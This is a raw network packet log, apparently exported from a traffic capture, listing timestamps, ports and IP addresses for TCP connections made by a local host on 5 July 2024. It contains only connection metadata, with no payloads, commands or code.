Jul 5, 2024 06:26:07.042074919 CEST | 49730 | 443 | 192.168.2.4 | 185.199.110.133
Jul 5, 2024 06:26:07.045623064 CEST | 49730 | 443 | 192.168.2.4 | 185.199.110.133
Jul 5, 2024 06:26:07.045643091 CEST | 443 | 49730 | 185.199.110.133 | 192.168.2.4
Jul 5, 2024 06:26:07.045923948 CEST | 443 | 49730 | 185.199.110.133 | 192.168.2.4
Jul 5, 2024 06:26:07.057264090 CEST | 49730 | 443 | 192.168.2.4 | 185.199.110.133
Jul 5, 2024 06:26:07.104499102 CEST | 443 | 49730 | 185.199.110.133 | 192.168.2.4
Jul 5, 2024 06:26:07.202990055 CEST | 443 | 49730 | 185.199.110.133 | 192.168.2.4
Jul 5, 2024 06:26:07.221538067 CEST | 443 | 49730 | 185.199.110.133 | 192.168.2.4
Jul 5, 2024 06:26:07.221555948 CEST | 443 | 49730 | 185.199.110.133 | 192.168.2.4
Jul 5, 2024 06:26:07.221612930 CEST | 49730 | 443 | 192.168.2.4 | 185.199.110.133
Jul 5, 2024 06:26:07.221638918 CEST | 443 | 49730 | 185.199.110.133 | 192.168.2.4
Jul 5, 2024 06:26:07.221685886 CEST | 49730 | 443 | 192.168.2.4 | 185.199.110.133
Jul 5, 2024 06:26:07.295720100 CEST | 443 | 49730 | 185.199.110.133 | 192.168.2.4
Jul 5, 2024 06:26:07.295738935 CEST | 443 | 49730 | 185.199.110.133 | 192.168.2.4
Jul 5, 2024 06:26:07.295800924 CEST | 49730 | 443 | 192.168.2.4 | 185.199.110.133
Jul 5, 2024 06:26:07.295823097 CEST | 443 | 49730 | 185.199.110.133 | 192.168.2.4
Jul 5, 2024 06:26:07.295849085 CEST | 49730 | 443 | 192.168.2.4 | 185.199.110.133
Jul 5, 2024 06:26:07.295877934 CEST | 49730 | 443 | 192.168.2.4 | 185.199.110.133
Jul 5, 2024 06:26:07.298392057 CEST | 443 | 49730 | 185.199.110.133 | 192.168.2.4
Jul 5, 2024 06:26:07.298408985 CEST | 443 | 49730 | 185.199.110.133 | 192.168.2.4
Jul 5, 2024 06:26:07.298459053 CEST | 49730 | 443 | 192.168.2.4 | 185.199.110.133
Jul 5, 2024 06:26:07.298472881 CEST | 443 | 49730 | 185.199.110.133 | 192.168.2.4
Jul 5, 2024 06:26:07.298495054 CEST | 49730 | 443 | 192.168.2.4 | 185.199.110.133
Jul 5, 2024 06:26:07.298511982 CEST | 49730 | 443 | 192.168.2.4 | 185.199.110.133
Jul 5, 2024 06:26:07.388679981 CEST | 443 | 49730 | 185.199.110.133 | 192.168.2.4
Jul 5, 2024 06:26:07.388705015 CEST | 443 | 49730 | 185.199.110.133 | 192.168.2.4
Jul 5, 2024 06:26:07.388747931 CEST | 443 | 49730 | 185.199.110.133 | 192.168.2.4
Jul 5, 2024 06:26:07.388770103 CEST | 49730 | 443 | 192.168.2.4 | 185.199.110.133
Jul 5, 2024 06:26:07.388789892 CEST | 443 | 49730 | 185.199.110.133 | 192.168.2.4
Jul 5, 2024 06:26:07.388818979 CEST | 49730 | 443 | 192.168.2.4 | 185.199.110.133
Jul 5, 2024 06:26:07.388823986 CEST | 443 | 49730 | 185.199.110.133 | 192.168.2.4
Jul 5, 2024 06:26:07.388847113 CEST | 49730 | 443 | 192.168.2.4 | 185.199.110.133
Jul 5, 2024 06:26:07.388873100 CEST | 49730 | 443 | 192.168.2.4 | 185.199.110.133
Jul 5, 2024 06:26:07.412744045 CEST | 49730 | 443 | 192.168.2.4 | 185.199.110.133
Jul 5, 2024 06:26:29.622279882 CEST | 49737 | 443 | 192.168.2.4 | 104.16.123.96
Jul 5, 2024 06:26:29.622308969 CEST | 443 | 49737 | 104.16.123.96 | 192.168.2.4
Jul 5, 2024 06:26:29.622379065 CEST | 49737 | 443 | 192.168.2.4 | 104.16.123.96
Jul 5, 2024 06:26:29.626208067 CEST | 49737 | 443 | 192.168.2.4 | 104.16.123.96
Jul 5, 2024 06:26:29.626219988 CEST | 443 | 49737 | 104.16.123.96 | 192.168.2.4
Jul 5, 2024 06:26:30.125380993 CEST | 443 | 49737 | 104.16.123.96 | 192.168.2.4
Jul 5, 2024 06:26:30.125508070 CEST | 49737 | 443 | 192.168.2.4 | 104.16.123.96
Jul 5, 2024 06:26:30.130045891 CEST | 49737 | 443 | 192.168.2.4 | 104.16.123.96
Jul 5, 2024 06:26:30.130064011 CEST | 443 | 49737 | 104.16.123.96 | 192.168.2.4
Jul 5, 2024 06:26:30.130362988 CEST | 443 | 49737 | 104.16.123.96 | 192.168.2.4
Jul 5, 2024 06:26:30.136507034 CEST | 49737 | 443 | 192.168.2.4 | 104.16.123.96
Jul 5, 2024 06:26:30.184492111 CEST | 443 | 49737 | 104.16.123.96 | 192.168.2.4
Jul 5, 2024 06:26:30.265733957 CEST | 443 | 49737 | 104.16.123.96 | 192.168.2.4
Jul 5, 2024 06:26:30.265825033 CEST | 443 | 49737 | 104.16.123.96 | 192.168.2.4
Jul 5, 2024 06:26:30.265893936 CEST | 49737 | 443 | 192.168.2.4 | 104.16.123.96
Jul 5, 2024 06:26:30.267995119 CEST | 49737 | 443 | 192.168.2.4 | 104.16.123.96
Jul 5, 2024 06:26:30.304100037 CEST | 63770 | 443 | 192.168.2.4 | 104.16.123.96
Jul 5, 2024 06:26:30.304141998 CEST | 443 | 63770 | 104.16.123.96 | 192.168.2.4
Jul 5, 2024 06:26:30.304229975 CEST | 63770 | 443 | 192.168.2.4 | 104.16.123.96
Jul 5, 2024 06:26:30.304616928 CEST | 63770 | 443 | 192.168.2.4 | 104.16.123.96
Jul 5, 2024 06:26:30.304635048 CEST | 443 | 63770 | 104.16.123.96 | 192.168.2.4
Jul 5, 2024 06:26:30.782536983 CEST | 443 | 63770 | 104.16.123.96 | 192.168.2.4
Jul 5, 2024 06:26:30.784148932 CEST | 63770 | 443 | 192.168.2.4 | 104.16.123.96
Jul 5, 2024 06:26:30.784169912 CEST | 443 | 63770 | 104.16.123.96 | 192.168.2.4
Jul 5, 2024 06:26:30.926700115 CEST | 443 | 63770 | 104.16.123.96 | 192.168.2.4
Jul 5, 2024 06:26:30.926775932 CEST | 443 | 63770 | 104.16.123.96 | 192.168.2.4
Jul 5, 2024 06:26:30.926829100 CEST | 63770 | 443 | 192.168.2.4 | 104.16.123.96
Jul 5, 2024 06:26:30.927222013 CEST | 63770 | 443 | 192.168.2.4 | 104.16.123.96
Jul 5, 2024 06:26:30.945823908 CEST | 63771 | 80 | 192.168.2.4 | 208.95.112.1
Jul 5, 2024 06:26:30.950701952 CEST | 80 | 63771 | 208.95.112.1 | 192.168.2.4
Jul 5, 2024 06:26:30.950824022 CEST | 63771 | 80 | 192.168.2.4 | 208.95.112.1
Jul 5, 2024 06:26:30.950978994 CEST | 63771 | 80 | 192.168.2.4 | 208.95.112.1
Jul 5, 2024 06:26:30.955740929 CEST | 80 | 63771 | 208.95.112.1 | 192.168.2.4
Jul 5, 2024 06:26:31.419663906 CEST | 80 | 63771 | 208.95.112.1 | 192.168.2.4
Jul 5, 2024 06:26:31.422158003 CEST | 63771 | 80 | 192.168.2.4 | 208.95.112.1
Jul 5, 2024 06:26:31.426989079 CEST | 80 | 63771 | 208.95.112.1 | 192.168.2.4
Jul 5, 2024 06:26:31.525300026 CEST | 80 | 63771 | 208.95.112.1 | 192.168.2.4
Jul 5, 2024 06:26:31.570112944 CEST | 63771 | 80 | 192.168.2.4 | 208.95.112.1
Jul 5, 2024 06:26:37.849798918 CEST | 63775 | 443 | 192.168.2.4 | 140.82.121.3
Jul 5, 2024 06:26:37.849836111 CEST | 443 | 63775 | 140.82.121.3 | 192.168.2.4
Jul 5, 2024 06:26:37.849915981 CEST | 63775 | 443 | 192.168.2.4 | 140.82.121.3
Jul 5, 2024 06:26:37.852606058 CEST | 63775 | 443 | 192.168.2.4 | 140.82.121.3
Jul 5, 2024 06:26:37.852618933 CEST | 443 | 63775 | 140.82.121.3 | 192.168.2.4
Jul 5, 2024 06:26:38.527287960 CEST | 443 | 63775 | 140.82.121.3 | 192.168.2.4
Jul 5, 2024 06:26:38.527364016 CEST | 63775 | 443 | 192.168.2.4 | 140.82.121.3
Jul 5, 2024 06:26:38.528985023 CEST | 63775 | 443 | 192.168.2.4 | 140.82.121.3
Jul 5, 2024 06:26:38.528992891 CEST | 443 | 63775 | 140.82.121.3 | 192.168.2.4
Jul 5, 2024 06:26:38.529221058 CEST | 443 | 63775 | 140.82.121.3 | 192.168.2.4
Jul 5, 2024 06:26:38.535197020 CEST | 63775 | 443 | 192.168.2.4 | 140.82.121.3
Jul 5, 2024 06:26:38.580499887 CEST | 443 | 63775 | 140.82.121.3 | 192.168.2.4
Jul 5, 2024 06:26:38.951947927 CEST | 443 | 63775 | 140.82.121.3 | 192.168.2.4
Jul 5, 2024 06:26:38.952028036 CEST | 443 | 63775 | 140.82.121.3 | 192.168.2.4
Jul 5, 2024 06:26:38.952094078 CEST | 443 | 63775 | 140.82.121.3 | 192.168.2.4
Jul 5, 2024 06:26:38.952209949 CEST | 63775 | 443 | 192.168.2.4 | 140.82.121.3
Jul 5, 2024 06:26:38.952982903 CEST | 63775 | 443 | 192.168.2.4 | 140.82.121.3
Jul 5, 2024 06:26:38.961651087 CEST | 63776 | 443 | 192.168.2.4 | 185.199.110.133
Jul 5, 2024 06:26:38.961690903 CEST | 443 | 63776 | 185.199.110.133 | 192.168.2.4
Jul 5, 2024 06:26:38.961774111 CEST | 63776 | 443 | 192.168.2.4 | 185.199.110.133
Jul 5, 2024 06:26:38.962129116 CEST | 63776 | 443 | 192.168.2.4 | 185.199.110.133
Jul 5, 2024 06:26:38.962145090 CEST | 443 | 63776 | 185.199.110.133 | 192.168.2.4
Jul 5, 2024 06:26:39.431457996 CEST | 443 | 63776 | 185.199.110.133 | 192.168.2.4
Jul 5, 2024 06:26:39.431528091 CEST | 63776 | 443 | 192.168.2.4 | 185.199.110.133
Jul 5, 2024 06:26:39.433170080 CEST | 63776 | 443 | 192.168.2.4 | 185.199.110.133
Jul 5, 2024 06:26:39.433186054 CEST | 443 | 63776 | 185.199.110.133 | 192.168.2.4
Jul 5, 2024 06:26:39.433418989 CEST | 443 | 63776 | 185.199.110.133 | 192.168.2.4
Jul 5, 2024 06:26:39.434314966 CEST | 63776 | 443 | 192.168.2.4 | 185.199.110.133
Jul 5, 2024 06:26:39.476511955 CEST | 443 | 63776 | 185.199.110.133 | 192.168.2.4
Jul 5, 2024 06:26:39.579740047 CEST | 443 | 63776 | 185.199.110.133 | 192.168.2.4
Jul 5, 2024 06:26:39.579817057 CEST | 443 | 63776 | 185.199.110.133 | 192.168.2.4
Jul 5, 2024 06:26:39.579843044 CEST | 443 | 63776 | 185.199.110.133 | 192.168.2.4
Jul 5, 2024 06:26:39.579886913 CEST | 63776 | 443 | 192.168.2.4 | 185.199.110.133
Jul 5, 2024 06:26:39.579909086 CEST | 443 | 63776 | 185.199.110.133 | 192.168.2.4
Jul 5, 2024 06:26:39.579948902 CEST | 63776 | 443 | 192.168.2.4 | 185.199.110.133
Jul 5, 2024 06:26:39.580043077 CEST | 443 | 63776 | 185.199.110.133 | 192.168.2.4
Jul 5, 2024 06:26:39.580117941 CEST | 443 | 63776 | 185.199.110.133 | 192.168.2.4
Jul 5, 2024 06:26:39.580167055 CEST | 63776 | 443 | 192.168.2.4 | 185.199.110.133
Jul 5, 2024 06:26:39.580810070 CEST | 63776 | 443 | 192.168.2.4 | 185.199.110.133
Jul 5, 2024 06:26:54.240715981 CEST | 63777 | 443 | 192.168.2.4 | 140.82.121.3
Jul 5, 2024 06:26:54.240781069 CEST | 443 | 63777 | 140.82.121.3 | 192.168.2.4
Jul 5, 2024 06:26:54.240988970 CEST | 63777 | 443 | 192.168.2.4 | 140.82.121.3
Jul 5, 2024 06:26:54.243410110 CEST | 63777 | 443 | 192.168.2.4 | 140.82.121.3
Jul 5, 2024 06:26:54.243427992 CEST | 443 | 63777 | 140.82.121.3 | 192.168.2.4
Jul 5, 2024 06:26:54.907527924 CEST | 443 | 63777 | 140.82.121.3 | 192.168.2.4
Jul 5, 2024 06:26:54.907604933 CEST | 63777 | 443 | 192.168.2.4 | 140.82.121.3
Jul 5, 2024 06:26:54.909018040 CEST | 63777 | 443 | 192.168.2.4 | 140.82.121.3
Jul 5, 2024 06:26:54.909025908 CEST | 443 | 63777 | 140.82.121.3 | 192.168.2.4
Jul 5, 2024 06:26:54.909260988 CEST | 443 | 63777 | 140.82.121.3 | 192.168.2.4
Jul 5, 2024 06:26:54.915211916 CEST | 63777 | 443 | 192.168.2.4 | 140.82.121.3
Jul 5, 2024 06:26:54.956512928 CEST | 443 | 63777 | 140.82.121.3 | 192.168.2.4
Jul 5, 2024 06:26:55.324431896 CEST | 443 | 63777 | 140.82.121.3 | 192.168.2.4
Jul 5, 2024 06:26:55.324518919 CEST | 443 | 63777 | 140.82.121.3 | 192.168.2.4
Jul 5, 2024 06:26:55.324584007 CEST | 443 | 63777 | 140.82.121.3 | 192.168.2.4
Jul 5, 2024 06:26:55.324613094 CEST | 63777 | 443 | 192.168.2.4 | 140.82.121.3
Jul 5, 2024 06:26:55.324651957 CEST | 63777 | 443 | 192.168.2.4 | 140.82.121.3
Jul 5, 2024 06:26:55.325402975 CEST | 63777 | 443 | 192.168.2.4 | 140.82.121.3
Jul 5, 2024 06:26:55.326422930 CEST | 63778 | 443 | 192.168.2.4 | 185.199.110.133
Jul 5, 2024 06:26:55.326452017 CEST | 443 | 63778 | 185.199.110.133 | 192.168.2.4
Jul 5, 2024 06:26:55.326540947 CEST | 63778 | 443 | 192.168.2.4 | 185.199.110.133
Jul 5, 2024 06:26:55.326791048 CEST | 63778 | 443 | 192.168.2.4 | 185.199.110.133
Jul 5, 2024 06:26:55.326807976 CEST | 443 | 63778 | 185.199.110.133 | 192.168.2.4
Jul 5, 2024 06:26:55.797172070 CEST | 443 | 63778 | 185.199.110.133 | 192.168.2.4
Jul 5, 2024 06:26:55.797383070 CEST | 63778 | 443 | 192.168.2.4 | 185.199.110.133
Jul 5, 2024 06:26:55.798542976 CEST | 63778 | 443 | 192.168.2.4 | 185.199.110.133
Jul 5, 2024 06:26:55.798552990 CEST | 443 | 63778 | 185.199.110.133 | 192.168.2.4
Jul 5, 2024 06:26:55.798791885 CEST | 443 | 63778 | 185.199.110.133 | 192.168.2.4
Jul 5, 2024 06:26:55.802694082 CEST | 63778 | 443 | 192.168.2.4 | 185.199.110.133
Jul 5, 2024 06:26:55.844505072 CEST | 443 | 63778 | 185.199.110.133 | 192.168.2.4
Jul 5, 2024 06:26:55.953613997 CEST | 443 | 63778 | 185.199.110.133 | 192.168.2.4
Jul 5, 2024 06:26:55.953679085 CEST | 443 | 63778 | 185.199.110.133 | 192.168.2.4
Jul 5, 2024 06:26:55.953715086 CEST | 443 | 63778 | 185.199.110.133 | 192.168.2.4
Jul 5, 2024 06:26:55.953752995 CEST | 63778 | 443 | 192.168.2.4 | 185.199.110.133
Jul 5, 2024 06:26:55.953785896 CEST | 443 | 63778 | 185.199.110.133 | 192.168.2.4
Jul 5, 2024 06:26:55.953800917 CEST | 443 | 63778 | 185.199.110.133 | 192.168.2.4
Jul 5, 2024 06:26:55.953846931 CEST | 63778 | 443 | 192.168.2.4 | 185.199.110.133
Jul 5, 2024 06:26:55.954256058 CEST | 63778 | 443 | 192.168.2.4 | 185.199.110.133
Jul 5, 2024 06:26:55.974687099 CEST | 63779 | 443 | 192.168.2.4 | 140.82.121.3
Jul 5, 2024 06:26:55.974740028 CEST | 443 | 63779 | 140.82.121.3 | 192.168.2.4
Jul 5, 2024 06:26:55.974858999 CEST | 63779 | 443 | 192.168.2.4 | 140.82.121.3
Jul 5, 2024 06:26:55.975554943 CEST | 63779 | 443 | 192.168.2.4 | 140.82.121.3
Jul 5, 2024 06:26:55.975583076 CEST | 443 | 63779 | 140.82.121.3 | 192.168.2.4
Jul 5, 2024 06:26:56.625751972 CEST | 443 | 63779 | 140.82.121.3 | 192.168.2.4
Jul 5, 2024 06:26:56.627275944 CEST | 63779 | 443 | 192.168.2.4 | 140.82.121.3
Jul 5, 2024 06:26:56.627309084 CEST | 443 | 63779 | 140.82.121.3 | 192.168.2.4
Jul 5, 2024 06:26:57.045866013 CEST | 443 | 63779 | 140.82.121.3 | 192.168.2.4
Jul 5, 2024 06:26:57.045957088 CEST | 443 | 63779 | 140.82.121.3 | 192.168.2.4
Jul 5, 2024 06:26:57.046015024 CEST | 443 | 63779 | 140.82.121.3 | 192.168.2.4
Jul 5, 2024 06:26:57.046041012 CEST | 63779 | 443 | 192.168.2.4 | 140.82.121.3
Jul 5, 2024 06:26:57.046088934 CEST | 63779 | 443 | 192.168.2.4 | 140.82.121.3
Jul 5, 2024 06:26:57.046679974 CEST | 63779 | 443 | 192.168.2.4 | 140.82.121.3
Jul 5, 2024 06:26:57.059622049 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:26:57.059655905 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:26:57.059741974 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:26:57.060031891 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:26:57.060044050 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:26:57.553483963 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:26:57.553600073 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:26:57.555454016 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:26:57.555464983 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:26:57.555710077 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:26:57.556725979 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:26:57.604516029 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:26:57.703094959 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:26:57.703263044 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:26:57.703275919 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:26:57.703341961 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:26:57.703356028 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:26:57.703484058 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:26:57.703608990 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:26:57.705912113 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:26:57.705944061 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:26:57.705991983 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:26:57.706002951 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:26:57.706068993 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:26:57.708592892 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:26:57.711332083 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:26:57.711429119 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:26:57.711433887 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:26:57.711474895 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:26:57.711530924 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:26:57.711535931 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:26:57.757700920 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:26:57.796036005 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:26:57.796094894 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:26:57.796123981 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:26:57.796142101 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:26:57.796149969 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:26:57.796164036 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:26:57.796212912 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:26:57.796235085 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:26:57.796267033 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:26:57.796272039 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:26:57.797068119 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:26:57.797091961 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:26:57.797118902 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:26:57.797125101 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:26:57.797164917 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:26:57.797595978 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:26:57.804217100 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:26:57.804245949 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:26:57.804294109 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:26:57.804299116 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:26:57.804363966 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:26:57.889249086 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:26:57.889272928 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:26:57.889396906 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:26:57.889414072 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:26:57.889499903 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:26:57.890738010 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:26:57.890754938 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:26:57.890851974 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:26:57.890858889 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:26:57.890959978 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:26:57.894126892 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:26:57.894143105 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:26:57.894187927 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:26:57.894193888 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:26:57.894206047 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:26:57.894236088 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:26:57.898714066 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:26:57.898730040 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:26:57.898823023 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:26:57.898828983 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:26:57.898907900 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:26:57.981885910 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:26:57.981903076 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:26:57.982019901 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:26:57.982039928 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:26:57.982103109 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:26:57.982126951 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:26:57.982134104 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:26:57.982281923 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:26:57.982287884 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:26:57.982358932 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:26:57.983251095 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:26:57.983266115 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:26:57.983344078 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:26:57.983347893 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:26:57.983407021 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:26:57.983557940 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:26:57.983572006 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:26:57.983623028 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:26:57.983627081 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:26:57.983683109 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:26:57.986818075 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:26:57.986835957 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:26:57.986902952 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:26:57.986903906 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:26:57.986910105 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:26:57.986952066 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:26:57.987406015 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:26:57.987421036 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:26:57.987509012 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:26:57.987514019 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:26:57.987584114 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:26:57.991467953 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:26:57.991487980 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:26:57.991539955 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:26:57.991544962 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:26:57.991569042 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:26:57.991600037 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:26:58.074600935 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:26:58.074623108 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:26:58.074702024 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:26:58.074752092 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:26:58.074770927 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:26:58.074836969 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:26:58.074970961 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:26:58.074986935 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:26:58.075035095 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:26:58.075041056 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:26:58.075074911 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
Jul 5, 2024 06:26:58.075274944 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:26:58.075295925 CEST | 443 | 63780 | 185.199.111.133 | 192.168.2.4
Jul 5, 2024 06:26:58.075333118 CEST | 63780 | 443 | 192.168.2.4 | 185.199.111.133
